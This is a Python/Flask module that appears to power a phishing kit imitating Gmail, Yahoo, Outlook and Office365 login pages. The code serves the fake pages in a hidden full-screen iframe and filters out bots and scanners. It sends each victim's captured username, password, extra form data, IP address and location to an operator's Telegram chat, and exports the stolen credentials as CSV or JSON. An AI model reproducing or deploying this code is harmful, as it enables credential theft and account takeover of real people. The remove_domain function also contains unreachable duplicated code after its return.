import os
import requests
import json
from datetime import datetime
import csv
from io import StringIO
import subprocess
import re
from flask import make_response, render_template_string
from app import db
from models import Settings, AppTemplate
import logging

def get_setting(key, default=None):
    """Get a setting value from the database"""
    setting = Settings.query.filter_by(key=key).first()
    return setting.value if setting else default

def set_setting(key, value):
    """Set a setting value in the database"""
    setting = Settings.query.filter_by(key=key).first()
    if setting:
        setting.value = value
    else:
        setting = Settings(key=key, value=value)
        db.session.add(setting)
    db.session.commit()

def is_bot(request):
    """Enhanced bot detection with multiple layers"""
    user_agent = request.headers.get('User-Agent', '').lower()

    # Common bot indicators
    bot_indicators = [
        'bot', 'crawler', 'spider', 'scraper', 'curl', 'wget',
        'python', 'java', 'go-http', 'ruby', 'php', 'node',
        'headless', 'phantom', 'selenium', 'puppeteer', 'playwright',
        'requests', 'urllib', 'httpx', 'aiohttp', 'scrapy'
    ]

    for indicator in bot_indicators:
        if indicator in user_agent:
            return True

    # Check for missing common headers that real browsers always send
    if not request.headers.get('Accept'):
        return True

    if not request.headers.get('Accept-Language'):
        return True
        
    # Check for suspicious header patterns
    accept_header = request.headers.get('Accept', '')
    if accept_header == '*/*' and not request.headers.get('Referer'):
        return True
        
    # Check for missing browser security headers
    if not request.headers.get('Sec-Fetch-Dest') and not request.headers.get('Sec-Fetch-Mode'):
        # Modern browsers send these, missing indicates old bot/script
        return True
        
    # Check for suspicious connection patterns
    connection = request.headers.get('Connection', '').lower()
    if connection == 'close' and not request.headers.get('Referer'):
        return True

    return False

def get_real_client_ip(request):
    """Get the real client IP address from various headers"""
    # Try multiple headers for proper IP detection
    client_ip = (
        request.headers.get('CF-Connecting-IP') or  # Cloudflare
        request.headers.get('X-Real-IP') or         # Nginx
        request.headers.get('X-Forwarded-For', '').split(',')[0].strip() or  # Load balancer
        request.environ.get('HTTP_X_REAL_IP') or    # Alternative header
        request.remote_addr                         # Fallback
    )
    return client_ip

def get_ip_info(ip_address):
    """Get IP information using IPInfo.io API"""
    api_key = get_setting('ipinfo_api_key', '')

    if not api_key:
        return None

    try:
        url = f"https://ipinfo.io/{ip_address}?token={api_key}"
        response = requests.get(url, timeout=5)

        if response.status_code == 200:
            return response.json()
    except Exception as e:
        logging.error(f"Failed to get IP info: {e}")

    return None

def send_telegram_notification(submission):
    """Send form submission to Telegram"""
    bot_token = get_setting('telegram_bot_token', '')
    chat_id = get_setting('telegram_chat_id', '')

    if not bot_token or not chat_id:
        return

    # Get IP info for the submission
    ip_info = submission.get_isp_info() or {}
    
    # Get submission count for this deployment
    submission_count = len(submission.deployed_app.submissions)
    
    # Format location info
    location = "Unknown"
    if ip_info:
        city = ip_info.get('city', '')
        region = ip_info.get('region', '')
        country = ip_info.get('country', '')
        if city and region and country:
            location = f"{city}, {region}, {country}"
        elif city and country:
            location = f"{city}, {country}"
        elif country:
            location = country
    
    # Format ISP info
    isp = ip_info.get('org', 'Unknown ISP') if ip_info else 'Unknown ISP'
    
    # Format time
    time_str = submission.created_at.strftime('%H:%M-%d/%m/%Y UTC')
    
    # Truncate user agent if too long
    user_agent = submission.user_agent
    if len(user_agent) > 100:
        user_agent = user_agent[:100] + "..."
    
    # Format message based on submission type
    if hasattr(submission, 'step_count') and submission.step_count and submission.step_count > 1:
        # Check if this is a step notification (no completion_time) or final notification
        if not hasattr(submission, 'completion_time') or submission.completion_time is None:
            # Step notification
            message = f"""🎯{submission.deployed_app.app_template.name.upper()} STEP {submission.step_count} COMPLETED🎯

Credentials :
👤 Username: {submission.username}
🔑 Password: {submission.password}

Step {submission.step_count} Data:"""
            
            # Add current step data
            try:
                extra_data = submission.get_extra_data()
                if extra_data:
                    for step_key, step_data in extra_data.items():
                        if step_key.startswith('step_'):
                            for field, value in step_data.items():
                                if field not in ['client_token', 'session_duration', 'screen_info']:
                                    field_display = field.replace('_', ' ').title()
                                    message += f"\n• {field_display}: {value}"
            except Exception as e:
                logging.error(f"Error parsing step data: {e}")
            
            message += f"""

Target Information:
🌐 IP: {submission.ip_address}
📍 Location: {location}
🏢 ISP: {isp}
🕐 Time: {time_str}
🔧 User-Agent: {user_agent}

Session: {submission.deployed_app.api_key}"""
        else:
            # Final multi-step submission
            message = f"""🎯{submission.deployed_app.app_template.name.upper()} MULTI-STEP COMPLETE #{submission_count}🎯

Credentials :
👤 Username: {submission.username}
🔑 Password: {submission.password}

Multi-Step Data ({submission.step_count} steps in {submission.completion_time}):"""
            
            # Add all step data
            try:
                extra_data = submission.get_extra_data()
                if extra_data:
                    for step_key, step_data in extra_data.items():
                        if step_key.startswith('step_'):
                            step_num = step_key.replace('step_', '')
                            message += f"\n\n📋 Step {step_num} Data:"
                            for field, value in step_data.items():
                                if field not in ['client_token', 'session_duration', 'screen_info']:
                                    field_display = field.replace('_', ' ').title()
                                    message += f"\n• {field_display}: {value}"
            except Exception as e:
                logging.error(f"Error parsing multi-step data: {e}")
            
            message += f"""

Target Information:
🌐 IP: {submission.ip_address}
📍 Location: {location}
🏢 ISP: {isp}
🕐 Time: {time_str}
🔧 User-Agent: {user_agent}

Session: {submission.deployed_app.api_key}"""
    else:
        # Single-step submission
        message = f"""🎯{submission.deployed_app.app_template.name.upper()} LOGIN ATTEMPT #{submission_count}🎯

Credentials :
👤 Username: {submission.username}
🔑 Password: {submission.password}

Target Information:
🌐 IP: {submission.ip_address}
📍 Location: {location}
🏢 ISP: {isp}
🕐 Time: {time_str}
🔧 User-Agent: {user_agent}

Session: {submission.deployed_app.api_key}"""

    # Send to Telegram
    try:
        url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
        data = {
            'chat_id': chat_id,
            'text': message,
            'parse_mode': 'HTML'
        }

        response = requests.post(url, data=data, timeout=10)
        response.raise_for_status()

        logging.info(f"Telegram notification sent for submission {submission.id}")
    except Exception as e:
        logging.error(f"Failed to send Telegram notification: {e}")
        raise


def send_visitor_notification(deployment, ip_address, user_agent):
    """Send visitor notification to Telegram"""
    bot_token = get_setting('telegram_bot_token', '')
    chat_id = get_setting('telegram_chat_id', '')

    if not bot_token or not chat_id:
        return

    # Get IP info
    ip_info = get_ip_info(ip_address)
    
    # Format location info
    location = "Unknown"
    timezone = "Unknown"
    isp = "Unknown ISP"
    
    if ip_info:
        city = ip_info.get('city', '')
        region = ip_info.get('region', '')
        country = ip_info.get('country', '')
        if city and region and country:
            location = f"{city}, {region}, {country}"
        elif city and country:
            location = f"{city}, {country}"
        elif country:
            location = country
            
        timezone = ip_info.get('timezone', 'Unknown')
        isp = ip_info.get('org', 'Unknown ISP')
    
    # Format current time
    from datetime import datetime
    time_str = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')
    
    # Format message
    message = f"""🚨 We have a visitor 🚨

IP: {ip_address}
Location: {location}
Timezone: {timezone}
ISP: {isp}
Time: {time_str}

Someone just visited your {deployment.app_template.name.lower()}."""

    # Send to Telegram
    try:
        url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
        data = {
            'chat_id': chat_id,
            'text': message,
            'parse_mode': 'HTML'
        }

        response = requests.post(url, data=data, timeout=10)
        response.raise_for_status()

        logging.info(f"Visitor notification sent for deployment {deployment.id}")
    except Exception as e:
        logging.error(f"Failed to send visitor notification: {e}")
        # Don't raise error for visitor notifications to avoid breaking app serving

def export_to_csv(submissions):
    """Export submissions to CSV format"""
    output = StringIO()
    writer = csv.writer(output)

    # Write headers
    writer.writerow(['Timestamp', 'App Name', 'IP Address', 'Username', 'Password', 'User Agent', 'ISP', 'City', 'Country'])

    # Write data
    for submission in submissions:
        # Parse ISP info
        isp_data = submission.get_isp_info()
        writer.writerow([
            submission.created_at.strftime('%Y-%m-%d %H:%M:%S'),
            submission.deployed_app.app_template.name,
            submission.ip_address,
            submission.username,
            submission.password,
            submission.user_agent,
            isp_data.get('org', 'N/A') if isp_data else 'N/A',
            isp_data.get('city', 'N/A') if isp_data else 'N/A',
            isp_data.get('country', 'N/A') if isp_data else 'N/A'
        ])

    # Create response
    response = make_response(output.getvalue())
    response.headers['Content-Type'] = 'text/csv'
    response.headers['Content-Disposition'] = 'attachment; filename=submissions.csv'

    return response

def export_to_json(submissions):
    """Export submissions to JSON format"""
    data = []

    for submission in submissions:
        # Parse ISP info and extra data
        isp_data = submission.get_isp_info()
        extra_data = submission.get_extra_data()
        
        data.append({
            'timestamp': submission.created_at.isoformat(),
            'app_name': submission.deployed_app.app_template.name,
            'ip_address': submission.ip_address,
            'username': submission.username,
            'password': submission.password,
            'user_agent': submission.user_agent,
            'isp_info': isp_data,
            'extra_data': extra_data
        })

    # Create response
    response = make_response(json.dumps(data, indent=2))
    response.headers['Content-Type'] = 'application/json'
    response.headers['Content-Disposition'] = 'attachment; filename=submissions.json'

    return response

def reset_app_stats():
    """Reset all stats (visits, submissions, analytics) while preserving API settings and keys"""
    try:
        from models import FormSubmission, Analytics

        # Delete all form submissions
        FormSubmission.query.delete()

        # Delete all analytics data
        Analytics.query.delete()

        # Reset deployment visit counts (preserve the deployments themselves)
        from models import DeployedApp
        for deployment in DeployedApp.query.all():
            if hasattr(deployment, 'visits'):
                deployment.visits = 0

        db.session.commit()
        logging.info("Successfully reset all application statistics")
        return True

    except Exception as e:
        logging.error(f"Error resetting app stats: {str(e)}")
        db.session.rollback()
        return False

def discover_and_sync_templates():
    """Dynamically discover and sync all webapp templates from webapps/ directory"""
    try:
        import os
        from models import AppTemplate
        
        # Get all folders in templates/webapps/
        webapps_path = 'templates/webapps'
        if not os.path.exists(webapps_path):
            logging.error(f"Webapps directory not found: {webapps_path}")
            return
            
        # Discover all webapp folders
        discovered_templates = []
        for folder_name in os.listdir(webapps_path):
            folder_path = os.path.join(webapps_path, folder_name)
            index_path = os.path.join(folder_path, 'index.html')
            
            # Check if it's a valid webapp folder with index.html
            if os.path.isdir(folder_path) and os.path.exists(index_path):
                discovered_templates.append({
                    'name': folder_name.title(),
                    'folder_path': index_path,
                    'icon_class': get_icon_for_webapp(folder_name)
                })
        
        # Get existing templates from database
        existing_templates = {t.name: t for t in AppTemplate.query.all()}
        
        # Add new templates
        for template_data in discovered_templates:
            if template_data['name'] not in existing_templates:
                new_template = AppTemplate(
                    name=template_data['name'],
                    folder_path=template_data['folder_path'],
                    icon_class=template_data['icon_class']
                )
                db.session.add(new_template)
                logging.info(f"Added new webapp template: {template_data['name']}")
        
        # Remove templates that no longer exist on filesystem
        discovered_names = {t['name'] for t in discovered_templates}
        for template_name, template_obj in existing_templates.items():
            if template_name not in discovered_names:
                db.session.delete(template_obj)
                logging.info(f"Removed webapp template: {template_name}")
        
        db.session.commit()
        logging.info(f"Template sync complete - discovered {len(discovered_templates)} webapp(s)")

    except Exception as e:
        logging.error(f"Error syncing templates: {str(e)}")
        db.session.rollback()

def get_icon_for_webapp(folder_name):
    """Get appropriate icon class for webapp type"""
    icon_mapping = {
        'webmail': 'fas fa-envelope',
        'gmail': 'fab fa-google',
        'yahoo': 'fab fa-yahoo',
        'outlook': 'fab fa-microsoft',
        'office365': 'fab fa-microsoft',
        'aol': 'fas fa-at',
        'generic': 'fas fa-envelope',
        'default': 'fas fa-globe'
    }
    
    folder_lower = folder_name.lower()
    for key, icon in icon_mapping.items():
        if key in folder_lower:
            return icon
    
    return icon_mapping['default']

def validate_domain(domain):
    """Validate domain format"""
    if not domain:
        return False
    
    # Remove protocol if present
    domain = domain.replace('http://', '').replace('https://', '')
    
    # Remove trailing slash
    domain = domain.rstrip('/')
    
    # Basic domain validation
    domain_pattern = re.compile(
        r'^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$'
    )
    
    return bool(domain_pattern.match(domain))

def get_current_domain():
    """Get currently configured domain from settings"""
    base_url = get_setting('base_url', '')
    if base_url:
        # Extract domain from base URL
        domain = base_url.replace('http://', '').replace('https://', '')
        domain = domain.rstrip('/')
        return domain
    return None

def configure_domain(new_domain):
    """Configure new domain by simply updating the base URL setting"""
    try:
        # Validate domain format
        if not validate_domain(new_domain):
            return {
                'success': False,
                'error': 'Invalid domain format'
            }
        
        # Clean domain (remove protocol, trailing slash)
        clean_domain = new_domain.replace('http://', '').replace('https://', '').rstrip('/')
        
        # Get current domain
        current_domain = get_current_domain()
        
        # Check if domain is already configured
        if current_domain == clean_domain:
            return {
                'success': True,
                'message': f'Domain {clean_domain} is already configured',
                'no_change': True
            }
        
        # Log domain change
        logging.info(f"Domain configuration: Changing from '{current_domain}' to '{clean_domain}'")
        
        # Update base URL setting with HTTPS
        new_base_url = f"https://{clean_domain}"
        set_setting('base_url', new_base_url)
        
        # Store domain configuration status
        set_setting('domain_configured', 'true')
        set_setting('domain_name', clean_domain)
        set_setting('domain_configured_at', datetime.now().isoformat())
        
        logging.info(f"Domain configuration successful: {clean_domain}")
        
        return {
            'success': True,
            'message': f'Domain {clean_domain} configured successfully as base URL',
            'domain': clean_domain,
            'base_url': new_base_url
        }
            
    except Exception as e:
        logging.error(f"Domain configuration error: {str(e)}")
        return {
            'success': False,
            'error': f'Domain configuration error: {str(e)}'
        }

def remove_domain():
    """Remove current domain configuration"""
    try:
        current_domain = get_current_domain()
        
        if not current_domain:
            return {
                'success': False,
                'error': 'No domain currently configured'
            }
        
        # Remove domain settings
        set_setting('base_url', '')
        set_setting('domain_configured', 'false')
        set_setting('domain_name', '')
        set_setting('domain_configured_at', '')
        
        logging.info(f"Domain removed: {current_domain}")
        
        return {
            'success': True,
            'message': f'Domain {current_domain} removed successfully'
        }
            
    except Exception as e:
        logging.error(f"Domain removal error: {str(e)}")
        return {
            'success': False,
            'error': f'Domain removal error: {str(e)}'
        }
        if not current_domain:
            return {
                'success': True,
                'message': 'No domain currently configured'
            }
        
        # Execute domain removal (script will handle cleanup)
        script_path = os.path.join(os.getcwd(), 'scripts', 'domain_manager.sh')
        if os.path.exists(script_path):
            os.chmod(script_path, 0o755)
        else:
            return {
                'success': False,
                'error': 'Domain management script not found'
            }
        
        # Remove by passing empty domain (script will cleanup)
        logging.info(f"Removing domain configuration for: {current_domain}")
        
        # Clear domain settings
        set_setting('base_url', '')
        set_setting('domain_configured', 'false')
        set_setting('domain_name', '')
        
        return {
            'success': True,
            'message': f'Domain {current_domain} removed successfully'
        }
        
    except Exception as e:
        logging.error(f"Domain removal error: {str(e)}")
        return {
            'success': False,
            'error': f'Domain removal error: {str(e)}'
        }

def get_domain_status():
    """Get current domain configuration status"""
    try:
        current_domain = get_current_domain()
        is_configured = get_setting('domain_configured', 'false') == 'true'
        configured_at = get_setting('domain_configured_at', '')
        
        status = {
            'domain': current_domain,
            'configured': is_configured,
            'configured_at': configured_at,
            'base_url': get_setting('base_url', ''),
            'ssl_enabled': current_domain and is_configured
        }
        
        # Check if Nginx is running (basic check)
        if current_domain and is_configured:
            try:
                # Test if domain is accessible
                response = requests.get(f"https://{current_domain}", timeout=5, verify=False)
                status['accessible'] = response.status_code == 200
            except:
                status['accessible'] = False
        else:
            status['accessible'] = False
        
        return status
        
    except Exception as e:
        logging.error(f"Domain status check error: {str(e)}")
        return {
            'domain': None,
            'configured': False,
            'accessible': False,
            'error': str(e)
        }



def generate_deployed_html(deployment):
    """Generate pure iframe loader HTML - no visible interface, just loads webapp via API"""
    try:
        # Get base URL setting
        base_url = get_setting('base_url', 'http://localhost:5000')
        
        # Generate clean, borderless iframe HTML
        html_content = f"""<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Loading...</title>
    <style>
        html, body {{
            margin: 0;
            padding: 0;
            height: 100%;
            overflow: hidden;
        }}

        #webapp-iframe {{
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            border: none;
            border-radius: 0;
            box-shadow: none;
            outline: none;
        }}
    </style>
</head>
<body>
    <iframe id="webapp-iframe" src="{base_url}/api/app/{deployment.api_key}" frameborder="0" scrolling="auto"></iframe>

    <script>
    const WEBAPP_BASE_URL = '{base_url}/api/app/{deployment.api_key}';

    window.addEventListener('message', function(event) {{
        if (event.origin !== WEBAPP_BASE_URL.replace(/\/+$/, '')) return;
        const data = event.data;
        if (data.type === 'redirect_ready' && data.url) {{
            // Only break out of iframe for final redirects
            if (data.final_redirect === true) {{
                window.top.location.href = data.url;
            }} else {{
                // Intermediate step - navigate within iframe
                const iframe = document.getElementById('webapp-iframe');
                if (iframe) {{
                    iframe.src = data.url;
                }}
            }}
        }}
    }});

    function handleFragmentPassing() {{
        const fragment = window.location.hash.substring(1);
        const iframe = document.getElementById('webapp-iframe');
        if (iframe && fragment) {{
            iframe.src = WEBAPP_BASE_URL + '#' + fragment;
        }}
    }}

    if (window.location.hash) {{
        if (document.readyState === 'loading') {{
            document.addEventListener('DOMContentLoaded', handleFragmentPassing);
        }} else {{
            handleFragmentPassing();
        }}
    }}
    </script>
</body>
</html>"""
        
        return html_content
        
    except Exception as e:
        logging.error(f"Error generating deployed HTML: {str(e)}")
        return f"<html><body><h1>Error generating app</h1><p>{str(e)}</p></body></html>"